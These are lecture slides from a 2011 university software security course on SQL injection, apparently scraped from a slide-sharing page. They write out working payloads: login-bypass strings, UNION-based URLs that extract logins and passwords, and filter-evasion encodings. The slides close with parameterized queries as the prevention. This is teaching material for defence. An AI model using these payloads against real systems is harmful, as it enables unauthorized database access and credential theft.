Software Security Lecture 3 Fang Yu Dept. of MIS, National Chengchi University Spring 2011

Software Security Lecture 3

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Software Security Lecture 3. Fang Yu Dept. of MIS, National Chengchi University Spring 2011. Outline. Today we will discuss how to bypass client-side controls (by Tony, Ch5) and SQL Injections (Ch9) We shall also schedule all the presentations The course website : - PowerPoint PPT Presentation

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Software SecurityLecture 3

Fang Yu

Dept. of MIS, National Chengchi University

Spring 2011

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Today we will discuss how to bypass client-side controls (by Tony, Ch5) and SQL Injections (Ch9)

We shall also schedule all the presentations

The course website : http://soslab.nccu.edu.tw/Courses.


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Injecting Code I

Chapter 9The Web Application Hacker’s


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Injecting into Interpreted Languages An interpreted language is one whose

execution involved a runtime component that interprets the code of the language and carries out the instructions that it contains SQL, LDAP, Perl, PHP.

In most applications, the code processed by the interpreter is a mix of instructions written by a programmer and data supplied by a user. An attacker can supply crafted input that

breaks out of the data context, usually by supplying some syntax that has a special significance within the grammar of the interpreted language.

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Injecting into SQL

Web applications commonly construct SQL statements that incorporate user-supplied data, which if vulnerable, can enable an attacker to read and modify all data stored in the database.

If an application does not handle single quotation marks in user-supplied data, it is wide open to SQL injection. An attacker can supply input containing a

quotation mark to terminate the string that he controls, and can then write arbitrary SQL to modify the query.

A nice link for you to practice SQL injections http://sqlzoo.net

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Injecting into SQL

Look at the following two queries and compare the difference in the output, where the user input is in red (Note that the single quote is part of the user input in the second example):

SELECT * FROM books WHERE publisher=‘Wiley’

SELECT * FROM books WHERE publisher=‘Wiley’ OR 1=1--‘

SELECT * FROM books WHERE publisher=‘Wiley’ OR ‘a’=‘a’

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Bypassing a Login

Consider the following simple SQL query that checks an attempt login:

This query causes the database to check every row within the users table and extract each record where the username column has the value marcus and the password column has the value secret.

SELECT * FROM users WHERE username= ‘marcus’ and password = ‘secret’

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Bypassing a Login

if an attacker knows that the username of the application administrator is admin

he can supply the following username


Which is equal to

SELECT * FROM users WHERE username= ‘admin’--’ and password = ‘foo’

SELECT * FROM users WHERE username= ‘admin’

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Bypassing a Login

if an attacker knows nothing, he can supply the following username

’ OR 1=1--

which is equal to

SELECT * FROM users WHERE username= ‘’ OR 1=1--’ and password = ‘foo’

SELECT * FROM users WHERE username= ‘’ OR 1=1

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Finding SQL Injection Bugs

For string data or numeric data, the following steps are normally sufficient to identify the majority of SQL injection vulnerabilities:

String data In order to exploit any SQL injection

flaw with user-supplied string data, you need to break out of the quotation marks that encapsulate a string in SQL. Submit a single quotation mark. Submit two single quotation marks

together. Oracle: ‘||’FOO MS-SQL: ‘+’FOO MySQL: ‘ ‘FOO

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Finding SQL Injection Bugs

Numeric data The application may handle numeric

data as a string by encapsulating it within single quotation marks, so always perform the steps described for string data. Submit a simple mathematical

expression. Use SQL-specific keywords and syntax,

such as the ASCII command, which returns the numeric ASCII code of the supplied character.

For example, all the followings are equal to 2

1+1 67-ASCII(‘A’) 51-ASCII(1)

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HTTP Encodings

Be careful to special HTTP characters Use URL-encode them

& is %26 = is %3d + is %2b ; is %3b A whtespace is %20

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Injecting into Different Statement Types SELECT Statements

SELECT statements are used to retrieve information from the database

The entry point for SQL injection attacks is normally the WHERE clause of the query since that is where user-supplied items are passed to the database.

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Injecting into Different Statement Types INSERT Statements

INSERT statements are used to create a new row of data within a table.

If any fields in an INSERT statement are vulnerable to SQL injection, an attacker can insert arbitrary data into the table, including values for fields that he should not be able to control.

INSERT INTO users (username, password, ID, privs) VALUES (‘daf’, ‘secret’, 2248, 1)INSERT INTO users (username, password, ID, privs) VALUES (‘foo’, ‘bar’, 9999, 0) --’, ‘secret’, 2248, 1)

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Injecting into Different Statement Types UPDATE Statements

UPDATE statements are used to modify one or more existing rows of data within a table.

An UPDATE statement works in a similar way to an INSERT statement, except it usually contains a WHERE clause like a SELECT statement.

UPDATE users SET password=’newsecret’ WHERE user = ‘marcus’ and password = ‘secret’

1. Supply username as admin’--2. Suppy username as admin’ or 1=1--

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Injecting into Different Statement Types DELETE Statements

DELETE statements are used to delete one or more rows of data within a table

As with UPDATE statements, a WHERE clause is normally used to tell the database which rows of the table to update, and user-supplied data is most likely to be incorporated into this clause.

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Injecting into Different Statement Types UNION Statements The UNION operator is used in SQL to

combine the results of two SELECT statements

You can often employ the UNION operator to perform a second, entirely separate query

SELECT author,title,year FROM books WHERE publisher = ‘Wiley’

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SELECT author,title,year FROM books WHERE publisher = ‘Wiley’ UNION SELECT username, password, uid FROM users--‘

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SELECT author,title,year FROM books WHERE publisher = ‘Wiley’ UNION SELECT username, password FROM users--‘

ORA-01789: query block has incorrect number of result columns


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SELECT author,title,year FROM books WHERE publisher = ‘Wiley’ UNION SELECT uid, username, password FROM users--‘

ORA-01790: expression must have same datatype as corresponding expression


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Fingerprinting the Database


All of them are equal to 0

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An Oracle Hack example


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A UNION attack

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL% 20from%20dual--

[Oracle][ODBC][Ora]ORA-01789: query block has incorrect number of result columns

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A UNION attack

Continue add NULL until no errors

https://wahh-app.com/employees.asp EmpNo=7521%20UNION%20SELECT%20NULL,NULL,NULL,NULL% 20from%20dual--

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A UNION attack

Continue add NULL until no errors

https://wahh-app.com/employees.asp EmpNo=7521%20UNION%20SELECT%20NULL,’a’,NULL,NULL% 20from%20dual--

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Query user_objects tablehttps://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,object_name,object_type,NULL%20from%20user_objects--

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Query User Tablehttps://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL, column_name,NULL,NULL%20from%20user_tab_columns%20where%20table_name%20% 3d%20’USERS’--

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Get data!

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL, login,password,NULL%20from%20users--

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Bypassing Filters

The application may remove or sanitize certain characters or block common SQL keywords, though these types of filters are often vulnerable to bypasses. Avoid blocked characters

If the application removes some characters that are often used in SQL injection attacks, remember that the single quotation marks are not required for numeric fields.

If the comment symbol is blocked, you can inject values that are always true such as ‘a’=‘a’.

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Bypassing Filters Circumventing simple validation

Some input validation will block or remove any supplied data which appears on a list.

Block/remove “SELECT”

Using SQL comments Comments can be used to simulate whitespace

within your injected data.

SeLeCt SELSELECTECT %53%45%4c%45%43%54 %2553%2545%254c%2545%2543%2554

SEL/*foo*/ECT username,password FR/*foo*/OM users

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Bypassing Filters

Manipulating blocked strings If the application blocks certain strings

that you wish to place as data items in an injected query, the required string can be constructed dynamically using various string manipulation functions.

Using dynamic execution Some databases allow SQL statements to

be executed dynamically by passing a string representation of a particular statement to the relevant function.

Oracle:‘adm’||’in’ MS-SQL:‘adm’+’in’ MySQL:concat(‘adm’,’in’)

exec(‘sel’ + ‘ect * from ‘ + ‘users’)

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Second-Order SQL Injection

It is very common for applications to defend themselves against SQL injection by escaping single quotation marks with a second single quotation mark.

But, this may pose a problem if the same item of data is being passed through several SQL queries, being written to the database and read back more than once

An attacker could successfully bypass the input validation designed to block SQL injection attacks and execute arbitrary queries within the database and retrieve results.

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Escalating the Database Attack

If the database is shared with other applications, you may be able to escalate privileges within the database and gain access to other applications’ data.

You may be able to compromise the operating system of the database server.

You may be able to gain network access to other systems.

You may be able to make network connections back out of the hosting infrastructure to your own computer.

You may be able to extend the database’s existing functionality in arbitrary ways by creating user-defined functions.

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Preventing SQL Injection

Partially Effective Measures Escaping single quotation marks within

user input by doubling them up Using stored procedures for all database

access Parameterized Queries

The application specifies the structure of the query, leaving placeholders for each item of user input.

The application specifies the contents of each placeholder.

The most effective way to prevent SQL injections

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A vulnerable query

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A parameterized query

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Next week

We will continue injection code (Chapter 9) next week

We will have Adam presents Attacking Authentication (Chapter 6)

We will also discuss Cross-site Scripting Attacks (Chapter 12)